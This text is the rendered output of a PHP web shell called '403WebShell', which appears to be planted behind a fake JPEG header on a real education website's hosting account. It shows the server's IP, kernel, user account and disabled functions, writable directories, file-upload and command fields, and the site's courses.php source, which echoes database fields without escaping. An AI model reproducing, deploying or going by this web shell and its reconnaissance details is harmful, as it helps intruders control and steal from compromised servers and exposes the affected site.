���� JFIF    aewtgwgerwasdasd403WebShell
403Webshell
Server IP : 147.93.80.58  /  Your IP : 216.73.216.195
Web Server : LiteSpeed
System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
User : u939086737 ( 939086737)
PHP Version : 8.2.28
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u939086737/domains/aaryaedutech.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u939086737/domains/aaryaedutech.com/public_html/courses.php
<?php include_once './action/config.php'; ?>
<!DOCTYPE html>
<html lang="en">

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- Link of CSS files -->
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/owl.carousel.min.css">
    <link rel="stylesheet" href="assets/css/remixicon.css">
    <link rel="stylesheet" href="assets/css/magnific-popup.min.css">
    <link rel="stylesheet" href="assets/css/header.css">
    <link rel="stylesheet" href="assets/css/style.css">
    <link rel="stylesheet" href="assets/css/footer.css">
    <link rel="stylesheet" href="assets/css/responsive.css">

    <title><?= $shop . ' | ' . $page ?></title>
    <link rel="icon" type="image/png" href="assets/img/all-img/favicon.png">
</head>

<body>

    <?php include './header.php' ?>

    <!--  Page Title Area Start-->
    <section class="page-title-area position-relative">
        <div class="container">
            <div class="main-max-width">
                <div class="page-title-content">
                    <h2>Courses</h2>
                    <ul class="page-breadcrumb align-items-center list-unstyle">
                        <li class="breadcrumb-item"><a href="./">Home</a></li>
                        <li class="breadcrumb-item"></li>
                        <li class="primery-link">Courses</li>
                    </ul>
                    <div class="shape-1 moveHorizontal">
                        <img src="assets/img/icon/shape-2.svg" alt="image">
                    </div>
                    <div class="shape-2">
                        <img src="assets/img/icon/section-icon-1.svg" alt="image">
                    </div>
                    <div class="shape-3 bounce">
                        <img src="assets/img/icon/section-icon-2.svg" alt="image">
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!--  Page Title Area End-->

    <!-- Courses Section Start -->
    <div class="courses-section pt-40 pb-100">
        <div class="container">
            <div class="main-max-width">
                <div class="edu-grid-sorting">
                    <div class="fitter-option filter-fixe justify-content-between d-flex align-items-center">
                        <p class="mb-0 mr-20">Showing 1-6 of 54 results</p>
                        <div class="fit-options d-flex">

                            <div class="accordion grid-short" id="grid-short-fore">
                                <div class="accordion-item position-relative">
                                    <h2 class="accordion-header">
                                        <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#gridShortFore">
                                            <span>Sort By</span>
                                        </button>
                                    </h2>
                                    <div id="gridShortFore" class="accordion-collapse collapse" data-bs-parent="#grid-short-fore">
                                        <div class="accordion-body">
                                            <ul class="list-unstyle p-0">
                                                <li><a href="#">Price Low to High</a></li>
                                                <li><a href="#">Name A to Z</a></li>
                                                <li><a href="#">Duration</a></li>
                                            </ul>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="row">

                    <?php
                    $qry = mysqli_query($con, "SELECT * FROM `courses` ORDER BY id DESC");
                    while ($res = mysqli_fetch_array($qry)) :
                    ?>
                        <div class="col-lg-4 col-sm-6 mix-target">
                            <div class="single-courses-box mb-25 box-shadow-2 border">
                                <div class="image mb-20 position-relative">
                                    <a href="javascript:course-details" class="d-block">
                                        <?php
                                        $thumbnail_path = "admin/images/" . $course_path . $res['thumbnail'];
                                        if (!file_exists($thumbnail_path) || empty($res['thumbnail'])) {
                                            $thumbnail_path = './assets/img/all-img/blank-photo.jpg';
                                        }
                                        ?>
                                        <img src="<?= $thumbnail_path ?>" alt="<?= $res['course_name'] ?>" style="height: 250px;">
                                    </a>
                                    <div class="cr-tag">
                                        <a href="javascript:course-details"><?= $res['course_name'] ?></a>
                                    </div>
                                </div>
                                <div class="content">
                                    <div class="meta-info my-2 d-flex align-items-center justify-content-between">
                                        <div class="cr-price w-100 d-flex justify-content-between align-items-center">
                                            <span><i class="ri-time-line"></i> <span><?= $res['duration'] ?></span></span>
                                            <span class="price">₹<?= $res['course_fee'] ?></span>
                                        </div>
                                    </div>
                                    <?php
                                    $desc = strip_tags($res['desc']);
                                    $desc_lines = explode("\n", wordwrap($desc, 80));
                                    $short_desc = implode("<br>", array_slice($desc_lines, 0, 2));
                                    ?>
                                    <h6 class="mb-15"><?= $short_desc ?><?= count($desc_lines) > 2 ? '...' : '' ?></h6>
                                </div>
                            </div>
                        </div>
                    <?php endwhile; ?>

                </div>
            </div>
        </div>
    </div>
    <!-- Courses Section End -->

    <?php include './footer.php' ?>
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit